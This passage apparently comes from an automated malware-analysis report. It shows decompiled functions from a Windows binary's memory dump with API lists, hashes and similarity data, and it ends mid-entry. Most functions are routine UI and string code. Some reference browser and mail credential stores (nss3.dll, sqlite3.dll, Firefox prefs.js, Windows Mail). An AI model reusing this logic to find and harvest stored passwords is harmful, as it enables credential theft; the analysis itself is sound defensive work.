                                                                                              • API String ID: 3510742995-2766056989
                                                                                              • Opcode ID: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                                                              • Instruction ID: cecad1072309209c94eeb2778a75b30bbc980c70aaade9bdc77468b7d13379ad
                                                                                              • Opcode Fuzzy Hash: 72109dd3c061e5e7965399845177051784b2c116136a58e32e92d3e3a8f21608
                                                                                              • Instruction Fuzzy Hash: 8B112BB29003056BDB288F16D8809AA77EAEF50344700063FFD0796291FB39DE55C6DC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406F6F, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 93%
                                                                                              			E00406F6F(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L004115D0();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L004115D6();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                              0x00406f6f
                                                                                              0x00406f70
                                                                                              0x00406f70
                                                                                              0x00406f73
                                                                                              0x00406f77
                                                                                              0x00406f8a
                                                                                              0x00406f8a
                                                                                              0x00406f8e
                                                                                              0x00406f90
                                                                                              0x00406f96
                                                                                              0x00406f97
                                                                                              0x00406f9a
                                                                                              0x00406fa3
                                                                                              0x00406fa4
                                                                                              0x00406fa9
                                                                                              0x00406fb3
                                                                                              0x00406fb5
                                                                                              0x00406fba
                                                                                              0x00406fc1
                                                                                              0x00406fcb
                                                                                              0x00406fcd
                                                                                              0x00406fce
                                                                                              0x00406fd3
                                                                                              0x00406fda
                                                                                              0x00406fe3
                                                                                              0x00406f79
                                                                                              0x00406f79
                                                                                              0x00406f7b
                                                                                              0x00406f7d
                                                                                              0x00406f82
                                                                                              0x00406f83
                                                                                              0x00406f86
                                                                                              0x00406f88
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f88
                                                                                              0x00406ff3
                                                                                              0x00406ff6
                                                                                              0x00406fff
                                                                                              0x00406fff
                                                                                              0x00406fe8
                                                                                              0x00406fec

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@memcpymemset
                                                                                              • String ID:
                                                                                              • API String ID: 1865533344-0
                                                                                              • Opcode ID: 51d873ac656c15b7a7b4c95b09edac65cc2407af7c36c5c472b2660f0814b8dc
                                                                                              • Instruction ID: 30667c860212afb2fcb1bf0ba773cc68d22997902d766bb0abd15f5aaececc89
                                                                                              • Opcode Fuzzy Hash: 51d873ac656c15b7a7b4c95b09edac65cc2407af7c36c5c472b2660f0814b8dc
                                                                                              • Instruction Fuzzy Hash: 81118F71204601AFD328DF1DD881A27F7E6FFD8340B21892EE59B87391DA35E841CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040EFAE, Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 37%
                                                                                              			E0040EFAE(char* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				char* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				char _v304;
				char* _t18;
				char* _t22;
				char* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040EF36;
					_v16 = __esi;
					__imp__SHBrowseForFolderA(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v304;
						__imp__SHGetPathFromIDListA(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							strcpy(__esi,  &_v304);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                              0x0040efb8
                                                                                              0x0040efbc
                                                                                              0x0040efbe
                                                                                              0x0040efc6
                                                                                              0x0040efcb
                                                                                              0x0040efd1
                                                                                              0x0040efd5
                                                                                              0x0040efd9
                                                                                              0x0040efdc
                                                                                              0x0040efdf
                                                                                              0x0040efe6
                                                                                              0x0040efed
                                                                                              0x0040eff0
                                                                                              0x0040eff6
                                                                                              0x0040effa
                                                                                              0x0040effc
                                                                                              0x0040f004
                                                                                              0x0040f00c
                                                                                              0x0040f016
                                                                                              0x0040f017
                                                                                              0x0040f01d
                                                                                              0x0040f01e
                                                                                              0x0040f025
                                                                                              0x0040f028
                                                                                              0x0040f02e
                                                                                              0x0040f02e
                                                                                              0x0040f031
                                                                                              0x0040f036

                                                                                              APIs
                                                                                              • SHGetMalloc.SHELL32(?), ref: 0040EFBE
                                                                                              • SHBrowseForFolderA.SHELL32(?), ref: 0040EFF0
                                                                                              • SHGetPathFromIDListA.SHELL32(00000000,?), ref: 0040F004
                                                                                              • strcpy.MSVCRT(?,?), ref: 0040F017
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: BrowseFolderFromListMallocPathstrcpy
                                                                                              • String ID:
                                                                                              • API String ID: 409945605-0
                                                                                              • Opcode ID: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
                                                                                              • Instruction ID: 0bece651b4572a5d25d0fced66708dfb83f65978f11dfbdadd7c1eadd6bf4f14
                                                                                              • Opcode Fuzzy Hash: 363e444f0183eb3209581039a296e9ed2a0e0cb40b9c5b89ec9b93d888cfbacc
                                                                                              • Instruction Fuzzy Hash: DD11F7B5900208AFCB10DFA9D9889EEBBFCFB49310F10447AEA05E7241D779DA458B64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A437, Relevance: 6.0, APIs: 4, Instructions: 45stringwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 80%
                                                                                              			E0040A437(void* __esi) {
				void* _v260;
				char _v516;
				void* __ebx;
				char* _t16;
				signed short _t25;
				signed short _t27;
				void* _t28;

				_t28 = __esi;
				_push(E00408647( *((intOrPtr*)(__esi + 0x370))));
				_t25 = 4;
				sprintf( &_v260, E004078FF(_t25));
				_t16 = E00408BDE( *((intOrPtr*)(__esi + 0x370)), 0);
				if(_t16 > 0) {
					_push(_t16);
					_t27 = 5;
					sprintf( &_v516, E004078FF(_t27));
					_t16 = strcat( &_v260,  &_v516);
				}
				if( *((intOrPtr*)(_t28 + 0x108)) != 0) {
					return SendMessageA( *(_t28 + 0x114), 0x401, 0,  &_v260);
				}
				return _t16;
			}










                                                                                              0x0040a437
                                                                                              0x0040a44c
                                                                                              0x0040a44f
                                                                                              0x0040a45d
                                                                                              0x0040a46d
                                                                                              0x0040a474
                                                                                              0x0040a476
                                                                                              0x0040a479
                                                                                              0x0040a487
                                                                                              0x0040a49a
                                                                                              0x0040a49f
                                                                                              0x0040a4aa
                                                                                              0x00000000
                                                                                              0x0040a4c0
                                                                                              0x0040a4c7

                                                                                              APIs
                                                                                                • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                                                • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                              • sprintf.MSVCRT ref: 0040A45D
                                                                                              • SendMessageA.USER32 ref: 0040A4C0
                                                                                                • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,75144DE0), ref: 0040797A
                                                                                                • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                              • sprintf.MSVCRT ref: 0040A487
                                                                                              • strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: sprintf$LoadMessageSendStringmemcpystrcatstrcpystrlen
                                                                                              • String ID:
                                                                                              • API String ID: 919693953-0
                                                                                              • Opcode ID: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                                                              • Instruction ID: 75288aada6eb4f7a447a9cf13bdf828529425e42ebb21a5188d22772f738aad9
                                                                                              • Opcode Fuzzy Hash: 90207433884269e3a26f13c39c42963f5ff8dc1025de2d2684d4a636a9e51624
                                                                                              • Instruction Fuzzy Hash: 2601DBB250030466D721B775DD86FEB73AC6F00304F40447BB74AF6082DABCE9808B29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F3BA, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 87%
                                                                                              			E0040F3BA(char* _a4) {
				void _v267;
				char _v268;
				int _t12;
				signed int _t16;

				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t12 = strlen(_a4);
				_t5 = strlen("sqlite3.dll") + 1; // 0x1
				if(_t12 + _t5 >= 0x104) {
					_v268 = 0;
				} else {
					E004062AD( &_v268, _a4, "sqlite3.dll");
				}
				_t16 = E0040614B( &_v268);
				asm("sbb eax, eax");
				return  ~( ~_t16);
			}







                                                                                              0x0040f3d5
                                                                                              0x0040f3dc
                                                                                              0x0040f3e4
                                                                                              0x0040f3f6
                                                                                              0x0040f3ff
                                                                                              0x0040f414
                                                                                              0x0040f401
                                                                                              0x0040f40b
                                                                                              0x0040f411
                                                                                              0x0040f422
                                                                                              0x0040f42b
                                                                                              0x0040f432

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F3DC
                                                                                              • strlen.MSVCRT ref: 0040F3E4
                                                                                              • strlen.MSVCRT ref: 0040F3F1
                                                                                                • Part of subcall function 004062AD: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062B5
                                                                                                • Part of subcall function 004062AD: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,00402138,00000000,nss3.dll), ref: 004062C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strlen$memsetstrcatstrcpy
                                                                                              • String ID: sqlite3.dll
                                                                                              • API String ID: 1581230619-1155512374
                                                                                              • Opcode ID: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                                                              • Instruction ID: fec7c4afce47c381fe657df57b8ff367c384fd882de8837a2d08c6e6e293e1f2
                                                                                              • Opcode Fuzzy Hash: 3cb808dc3fd31d135458d717301fbb3bbf110c950f4aa8e177593d82486e3e62
                                                                                              • Instruction Fuzzy Hash: 4BF02D3144C1286ADB10E769DC45FCA7BAC8FA1318F1040B7F586E60D2D9B89AC98668
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004098F4, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004098F4(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t15;
				intOrPtr* _t24;
				char* _t26;

				_t24 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
				_t26 =  &_v260;
				E00409018(_t26, _t15);
				sprintf( &_v516, "</%s>\r\n", _t26);
				return E00405EFD(_a4,  &_v516);
			}











                                                                                              0x0040990e
                                                                                              0x00409910
                                                                                              0x00409917
                                                                                              0x00409926
                                                                                              0x0040992d
                                                                                              0x00409939
                                                                                              0x0040993d
                                                                                              0x00409943
                                                                                              0x00409957
                                                                                              0x00409971

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00409917
                                                                                              • memset.MSVCRT ref: 0040992D
                                                                                                • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                                • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                              • sprintf.MSVCRT ref: 00409957
                                                                                                • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                              • String ID: </%s>
                                                                                              • API String ID: 3202206310-259020660
                                                                                              • Opcode ID: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                                                              • Instruction ID: adbfc7571eef3522ba50f6b4148bdf50dea618c8f0168b60c77ad4ff43fabaf4
                                                                                              • Opcode Fuzzy Hash: 8cbe72e2fc2d9776a491eb44f024350a6eb65ee3e03a862d51b3af92fd5e6b23
                                                                                              • Instruction Fuzzy Hash: B201D1729001297AD720A719CC45FDA7AACAF84304F0400FAB60AF3182DA749F848BA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406734, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406734(char* __edi, char* _a4) {
				char* _t12;
				int _t13;

				_t12 = __edi;
				_t13 = strlen(__edi);
				if(strlen(_a4) + _t13 < 0x104) {
					_t2 =  &_a4; // 0x410d64
					strcat(_t13 + __edi,  *_t2);
				}
				return _t12;
			}





                                                                                              0x00406734
                                                                                              0x0040673f
                                                                                              0x0040674f
                                                                                              0x00406751
                                                                                              0x00406758
                                                                                              0x0040675e
                                                                                              0x00406762

                                                                                              APIs
                                                                                              • strlen.MSVCRT ref: 00406736
                                                                                              • strlen.MSVCRT ref: 00406741
                                                                                              • strcat.MSVCRT(00000000,dA,0000001C,00410D64,\Microsoft\Windows Mail,?,?,?), ref: 00406758
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strlen$strcat
                                                                                              • String ID: dA
                                                                                              • API String ID: 2335785903-82490789
                                                                                              • Opcode ID: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                                                              • Instruction ID: 8adb96eafe51badce5d1f431fd236154b3227263db9247bb640c15329514921a
                                                                                              • Opcode Fuzzy Hash: 8b0d949a9835eed74c78f3475c18959fb5a6152aa5369579c15a011cca720fff
                                                                                              • Instruction Fuzzy Hash: EFD05E3350852036C5152316BC429DE5B82CBC037CB15445FF609921A1E93D84D1859D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00402221, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 89%
                                                                                              			E00402221(void* __ecx, intOrPtr _a4, char* _a8) {
				void* __ebx;
				intOrPtr _t22;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t32;
				void* _t36;
				signed short _t42;
				char* _t47;
				void* _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				void* _t57;

				_t22 = _a4;
				_t57 = _t22 - 6;
				_t47 = _a8;
				_t48 = __ecx;
				 *_t47 = 0;
				if(_t57 > 0) {
					_t23 = _t22 - 7;
					if(_t23 == 0) {
						return __ecx + 0x214;
					}
					_t25 = _t23 - 1;
					if(_t25 == 0) {
						return __ecx + 0x294;
					}
					_t27 = _t25 - 1;
					if(_t27 == 0) {
						return __ecx + 0x314;
					}
					_t29 = _t27 - 1;
					if(_t29 == 0) {
						_t49 =  *((intOrPtr*)(__ecx + 0x3a0));
						if(_t49 < 1 || _t49 > 7) {
							if(_t49 < 8 || _t49 > 0xe) {
								if(_t49 < 0xf || _t49 > 0x19) {
									if(_t49 < 0x1a || _t49 > 0x2d) {
										if(_t49 < 0x2e) {
											L16:
											return _t47;
										}
										_t42 = 0x519;
									} else {
										_t42 = 0x518;
									}
								} else {
									_t42 = 0x517;
								}
							} else {
								_t42 = 0x516;
							}
							goto L20;
						} else {
							_t42 = 0x515;
							L20:
							return E004078FF(_t42);
						}
					}
					_t32 = _t29 - 1;
					if(_t32 == 0) {
						return __ecx + 0x190;
					}
					if(_t32 != 1) {
						goto L16;
					}
					_t50 =  *((intOrPtr*)(__ecx + 0x39c));
					L14:
					if(_t50 != 0) {
						_push(0xa);
						_push(_t47);
						_push(_t50);
						L0041158E();
					}
					goto L16;
				}
				if(_t57 == 0) {
					_t42 =  *((intOrPtr*)(__ecx + 0x210)) + 0x320;
					goto L20;
				}
				if(_t22 == 0xfffffff6) {
					_t36 = E004078FF( *((intOrPtr*)(__ecx + 0x8c)) + 0x384);
					sprintf(_t47, "%s  %s  %s", E004078FF( *((intOrPtr*)(_t48 + 0x210)) + 0x320), _t48 + 0x110, _t36);
					goto L16;
				}
				if(_t22 == 0) {
					return __ecx + 0xc;
				}
				if(_t22 == 1) {
					_t42 =  *((intOrPtr*)(__ecx + 0x8c)) + 0x384;
					goto L20;
				}
				if(_t22 == 2) {
					return __ecx + 0x90;
				}
				if(_t22 == 3) {
					return __ecx + 0x110;
				}
				if(_t22 == 4) {
					_t50 =  *((intOrPtr*)(__ecx + 0x394));
					goto L14;
				}
				if(_t22 != 5) {
					goto L16;
				}
				if( *((intOrPtr*)(__ecx + 0x398)) == 0) {
					_push(0x10);
				} else {
					_push(0xf);
				}
				_pop(_t42);
				goto L20;
			}

















                                                                                              0x00402221
                                                                                              0x00402225
                                                                                              0x0040222b
                                                                                              0x0040222f
                                                                                              0x00402231
                                                                                              0x00402234
                                                                                              0x00402312
                                                                                              0x00402315
                                                                                              0x00000000
                                                                                              0x004023c2
                                                                                              0x0040231b
                                                                                              0x0040231c
                                                                                              0x00000000
                                                                                              0x004023ba
                                                                                              0x00402322
                                                                                              0x00402323
                                                                                              0x00000000
                                                                                              0x004023b2
                                                                                              0x00402329
                                                                                              0x0040232a
                                                                                              0x00402349
                                                                                              0x00402352
                                                                                              0x00402366
                                                                                              0x0040237a
                                                                                              0x0040238e
                                                                                              0x004023a2
                                                                                              0x0040228e
                                                                                              0x00000000
                                                                                              0x0040228e
                                                                                              0x004023a8
                                                                                              0x00402395
                                                                                              0x00402395
                                                                                              0x00402395
                                                                                              0x00402381
                                                                                              0x00402381
                                                                                              0x00402381
                                                                                              0x0040236d
                                                                                              0x0040236d
                                                                                              0x0040236d
                                                                                              0x00000000
                                                                                              0x00402359
                                                                                              0x00402359
                                                                                              0x004022b7
                                                                                              0x00000000
                                                                                              0x004022b7
                                                                                              0x00402352
                                                                                              0x0040232c
                                                                                              0x0040232d
                                                                                              0x00000000
                                                                                              0x00402341
                                                                                              0x00402330
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402336
                                                                                              0x0040227e
                                                                                              0x00402280
                                                                                              0x00402282
                                                                                              0x00402284
                                                                                              0x00402285
                                                                                              0x00402286
                                                                                              0x0040228b
                                                                                              0x00000000
                                                                                              0x00402280
                                                                                              0x0040223a
                                                                                              0x0040230a
                                                                                              0x00000000
                                                                                              0x0040230a
                                                                                              0x00402243
                                                                                              0x004022d5
                                                                                              0x004022fa
                                                                                              0x00000000
                                                                                              0x004022ff
                                                                                              0x0040224b
                                                                                              0x00000000
                                                                                              0x004022c1
                                                                                              0x00402250
                                                                                              0x004022b1
                                                                                              0x00000000
                                                                                              0x004022b1
                                                                                              0x00402255
                                                                                              0x00000000
                                                                                              0x004022a0
                                                                                              0x0040225a
                                                                                              0x00000000
                                                                                              0x00402295
                                                                                              0x0040225f
                                                                                              0x00402278
                                                                                              0x00000000
                                                                                              0x00402278
                                                                                              0x00402264
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040226d
                                                                                              0x00402274
                                                                                              0x0040226f
                                                                                              0x0040226f
                                                                                              0x0040226f
                                                                                              0x00402271
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _ultoasprintf
                                                                                              • String ID: %s %s %s
                                                                                              • API String ID: 432394123-3850900253
                                                                                              • Opcode ID: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                                                              • Instruction ID: d9c328b9b741649d7ae815da5d558f3ae5f994b92098e95e7c9169487fd3f945
                                                                                              • Opcode Fuzzy Hash: 7ea893eb970b9f9c330beb309c0cc5b8cf8f56ebc8930b7fcefd01bde23561b2
                                                                                              • Instruction Fuzzy Hash: C4410932504B15C7C636956487CCBEBA264A742304F6508BFEC5AF72D1C2FCAD41976B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D37A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 89%
                                                                                              			E0040D37A(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v328;
				char _v652;
				char _v928;
				char _v1296;
				signed int _v1300;
				void* __esi;
				char* _t26;
				intOrPtr* _t43;

				_v1300 = _v1300 | 0xffffffff;
				_v1296 = 0;
				_v328 = 0;
				_v652 = 0;
				_t43 = __ecx;
				E00406E68( &_v1300, __eflags, "*.*", _a4);
				while(E00406EC3( &_v1300) != 0) {
					__eflags = E00406E2D( &_v1300);
					if(__eflags == 0) {
						__eflags = _a8 - 1;
						if(_a8 > 1) {
							_t26 =  &_v928;
							_push("prefs.js");
							_push(_t26);
							L004115B2();
							__eflags = _t26;
							if(_t26 == 0) {
								__eflags = E0040614B( &_v652);
								if(__eflags != 0) {
									E0040D1EC(_t43, __eflags,  &_v652);
								}
							}
						}
					} else {
						_a8 = _a8 + 1;
						E0040D37A(_t43, __eflags,  &_v652, _a8);
					}
				}
				E00406F5B( &_v1300);
				return 1;
			}











                                                                                              0x0040d386
                                                                                              0x0040d391
                                                                                              0x0040d395
                                                                                              0x0040d39c
                                                                                              0x0040d3ac
                                                                                              0x0040d3ae
                                                                                              0x0040d418
                                                                                              0x0040d3be
                                                                                              0x0040d3c0
                                                                                              0x0040d3d9
                                                                                              0x0040d3dd
                                                                                              0x0040d3df
                                                                                              0x0040d3e6
                                                                                              0x0040d3eb
                                                                                              0x0040d3ec
                                                                                              0x0040d3f1
                                                                                              0x0040d3f5
                                                                                              0x0040d404
                                                                                              0x0040d407
                                                                                              0x0040d413
                                                                                              0x0040d413
                                                                                              0x0040d407
                                                                                              0x0040d3f5
                                                                                              0x0040d3c2
                                                                                              0x0040d3c2
                                                                                              0x0040d3d2
                                                                                              0x0040d3d2
                                                                                              0x0040d3c0
                                                                                              0x0040d429
                                                                                              0x0040d435

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strlen$FileFindFirst
                                                                                              • String ID: *.*$prefs.js
                                                                                              • API String ID: 2516927864-1592826420
                                                                                              • Opcode ID: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
                                                                                              • Instruction ID: f0fdac10561689b7590a9d658f3f63ad40faf00aab35cef1d8d79f75c7dff1a2
                                                                                              • Opcode Fuzzy Hash: 3e701ac251ef0c92007320573df48c8a58c02c849dde9726d81be77e97480d08
                                                                                              • Instruction Fuzzy Hash: 2711E731408349AAD720EAA5C8019DB77DC9F85324F00493FF869E21C1DB38E61E87AB
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406680, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406680(intOrPtr* __ebx, intOrPtr __ecx, char* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;
				intOrPtr _t23;
				intOrPtr* _t33;
				intOrPtr _t34;
				char* _t38;

				_t38 = __edi;
				_t34 = __ecx;
				_t33 = __ebx;
				_t23 = 1;
				if(__ebx != 0) {
					_t23 =  *__ebx;
				}
				_v64 = _v64 & 0x00000000;
				_v44 = _v44 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v56 = _t23;
				_v32 = _a8;
				_v20 = _a12;
				_v76 = _t34;
				_v80 = 0x4c;
				_v68 = _a4;
				_v52 = _t38;
				_v48 = 0x104;
				_v28 = 0x80806;
				if(GetSaveFileNameA( &_v80) == 0) {
					return 0;
				} else {
					if(_t33 != 0) {
						 *_t33 = _v56;
					}
					strcpy(_t38, _v52);
					return 1;
				}
			}



















                                                                                              0x00406680
                                                                                              0x00406680
                                                                                              0x00406680
                                                                                              0x00406688
                                                                                              0x0040668b
                                                                                              0x0040668d
                                                                                              0x0040668d
                                                                                              0x0040668f
                                                                                              0x00406693
                                                                                              0x00406697
                                                                                              0x0040669b
                                                                                              0x004066a1
                                                                                              0x004066a7
                                                                                              0x004066aa
                                                                                              0x004066b4
                                                                                              0x004066bb
                                                                                              0x004066be
                                                                                              0x004066c1
                                                                                              0x004066c8
                                                                                              0x004066d7
                                                                                              0x004066f5
                                                                                              0x004066d9
                                                                                              0x004066db
                                                                                              0x004066e0
                                                                                              0x004066e0
                                                                                              0x004066e6
                                                                                              0x004066f1
                                                                                              0x004066f1

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileNameSavestrcpy
                                                                                              • String ID: L
                                                                                              • API String ID: 1182090483-2909332022
                                                                                              • Opcode ID: 60ad435b05b414f2b30048372afc6468a300e5fb370a7e0e1bfb6bb36773f123
                                                                                              • Instruction ID: a38c0b8f1c2b7ba0f1b8aa2faef71ae79cae630a3543d59e66951d479f2b4fd1
